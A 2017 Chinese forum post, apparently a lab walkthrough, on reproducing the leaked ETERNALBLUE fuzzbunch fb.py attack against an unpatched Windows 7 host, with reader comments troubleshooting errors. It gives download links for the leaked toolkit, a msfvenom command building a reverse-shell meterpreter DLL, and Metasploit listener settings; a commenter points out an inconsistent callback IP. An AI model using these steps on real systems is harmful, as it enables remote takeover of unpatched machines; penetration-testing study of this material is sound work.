方程式ETERNALBLUE 之fb.py的复现

2017-04-15 17:04:29 135 34652 1
那会在微信群,9484应大家的建议,写了一篇关于方程式的FB.py复现的一篇文章,这篇文章是9484写的,我只是代发。推给大家,希望能解决大家的困惑,文章写的很清晰,我不多BB了,不然要挨骂。嘿嘿。
十分感谢9484大牛的分享!

0x01.环境简介

攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100

0x02.windows2003攻击机

攻击机win2003安装环境:

python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master


安装好python后,需要在win2003设置环境变量:



将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上



在windows目录下建立一个文件为:listeningposts

运行phthon  fb.py

以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。







0x03.攻击机kali上

利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll


将s.dll文件拷贝到windows2003的C盘目录下:

在msf下开启msfpaylod监听:
use exploit/multi/handler

set lhost 192.168.1.106

set lport 5555

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit


0x04.接着在windows2003下执行







最后在msf下可以看到成功反弹shell:



doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
类别 渗透测试

关于作者

我已成年23篇文章498篇回复

我已成年
135

评论135次

要评论?请先  登录  或  注册
  • 95楼
    muous
    Rank: 2
    2017-4-17 09:07

    兄弟 你代发也细点心不要误导他人好么? 你有没有拿着流程去做测试? “利用msf生成一个dll劫持文件:” 这个部分哪里出来的1.131? 你生成131 dll试试 如果能成功就见鬼了,发帖子要负责任,不是复制粘贴

  • 94楼
    我已成年
    Rank: 2
    2017-4-17 02:39
    Anonymous

    请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年

    1
    lovecmd

    在fb.py同目录下,建一个listeningposts空文件夹就行了。

    2
    Anonymous

    用的32位xi统 装的32位python 装了pywin32 建了文件夹了 重启了 最后出现这个情况

    5

    这个,绝对是环境的问题

  • 93楼
    我已成年
    Rank: 2
    2017-4-17 02:38
    isofia

    Negotiate error code is:00000002 Sending X224 Connect request (negotiate protocol:Old RDP) SSL rejected - reverting to old style RDP - Warning: connection notencrypted Sending MCS Connect Initial request Received MCS Connect response Connected to target, pinging backdoor... Error receiving data packet Bytes received:0000 CNESocket error:00050011 OsError:00002746 Error reading from socket Closing and cleaning up RDP session Plugin failed Error: Doublepulsar Failed这是个什么情况

    1

    不存在

  • 92楼
    大大怪
    Rank: 2
    2017-4-16 23:22
    isofia

    Negotiate error code is:00000002 Sending X224 Connect request (negotiate protocol:Old RDP) SSL rejected - reverting to old style RDP - Warning: connection notencrypted Sending MCS Connect Initial request Received MCS Connect response Connected to target, pinging backdoor... Error receiving data packet Bytes received:0000 CNESocket error:00050011 OsError:00002746 Error reading from socket Closing and cleaning up RDP session Plugin failed Error: Doublepulsar Failed这是个什么情况

    1

    这好像就是漏洞不存在

  • 91楼
    Anonymous
    Rank: 2
    2017-4-16 23:21
    Anonymous

    请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年

    1
    lovecmd

    在fb.py同目录下,建一个listeningposts空文件夹就行了。

    2
    我已成年

    python2.6是装的32位吗?pywin32 都需要的

    4

    用的32位xi统 装的32位python 装了pywin32 建了文件夹了 重启了 最后出现这个情况

  • 90楼
    isofia
    Rank: 1
    2017-4-16 23:12

    [-] Negotiate error code is:00000002 [.] Sending X224 Connect request (negotiate protocol:Old RDP) [.] SSL rejected - reverting to old style RDP - Warning: connection not encrypted [.] Sending MCS Connect Initial request [.] Received MCS Connect response [+] Connected to target, pinging backdoor... [-] Error receiving data packet [-] Bytes received:0000 CNESocket error:00050011 OsError:00002746 [-] Error reading from socket [.] Closing and cleaning up RDP session [!] Plugin failed [-] Error: Doublepulsar Failed 这是个什么情况

  • 89楼
    我已成年
    Rank: 2
    2017-4-16 22:08
    Anonymous

    请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年

    1
    lovecmd

    在fb.py同目录下,建一个listeningposts空文件夹就行了。

    2
    Anonymous

    我建文件夹了呀,完全按照教程来的

    3

    python2.6是装的32位吗?pywin32 都需要的

  • 88楼
    Anonymous
    Rank: 2
    2017-4-16 22:03
    Anonymous

    请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年

    1
    lovecmd

    在fb.py同目录下,建一个listeningposts空文件夹就行了。

    2

    我建文件夹了呀,完全按照教程来的

  • 87楼
    lovecmd
    Rank: 1
    2017-4-16 21:47
    Anonymous

    请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年

    1

    在fb.py同目录下,建一个listeningposts空文件夹就行了。

  • 86楼
    我已成年
    Rank: 2
    2017-4-16 20:33
    Anonymous

    请问这个情况是应该把代码注释掉么?真没发现上面有和我一样的问题啊@我已成年

    1

    注释一下就好

  • 85楼
    我已成年
    Rank: 2
    2017-4-16 18:40
    28270372

    要狂就狂这一回,我也称年爱谁谁?

    1

    我已成年 爱谁谁

  • 84楼
    我已成年
    Rank: 2
    2017-4-16 18:39
    Sonar

    配置一样,msf监听不了,目标机一分钟后重启,试了两次了,都是这样

    1

    lsass.exe 进程名改掉

  • 83楼
    Anonymous
    Rank: 2
    2017-4-16 18:22

    请问这个情况是应该把代码注释掉么? 真没发现上面有和我一样的问题啊 @我已成年

  • 82楼
    机智的alex
    Rank: 2
    2017-4-16 17:57
    Sonar

    配置一样,msf监听不了,目标机一分钟后重启,试了两次了,都是这样

    1

    win7和你一样,dll注入到xi统的进程,一分钟自动重启了。。。

  • 81楼
    我已成年
    Rank: 2
    2017-4-16 17:52
    hackwlz

    mac 64位,怎么执行 32位的?

    1

    这个就不知道了

  • 80楼
    hackwlz
    Rank: 1
    2017-4-16 16:40

    mac 64位,怎么执行 32位的?

  • 79楼
    lovecmd
    Rank: 1
    2017-4-16 16:29

    试了一下,还是坐等出个好用点的exp吧。。。。

  • 78楼
    F0rg3t
    Rank: 2
    2017-4-16 15:27

    空欢喜一场啊,还以为可以日遍内网,结果隔壁的抠脚大汉用win10不受影响

  • 77楼
    Aimuer
    Rank: 1
    2017-4-16 15:17
    czyccs

    Traceback (most recent call last): File "fb.py", line 37, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Python26\windows\fuzzbunch\edfplugin.py", line 5, in <module> import edfexecution File "C:\Python26\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipeImportError: DLL load failed: %1 不是有效的 Win32 应用程序。搞了2小时,各种出错

    1

    py版本必须32位的

  • 76楼
    F0rg3t
    Rank: 2
    2017-4-16 15:13

    win7 64可以成功,靶机是win10 没成功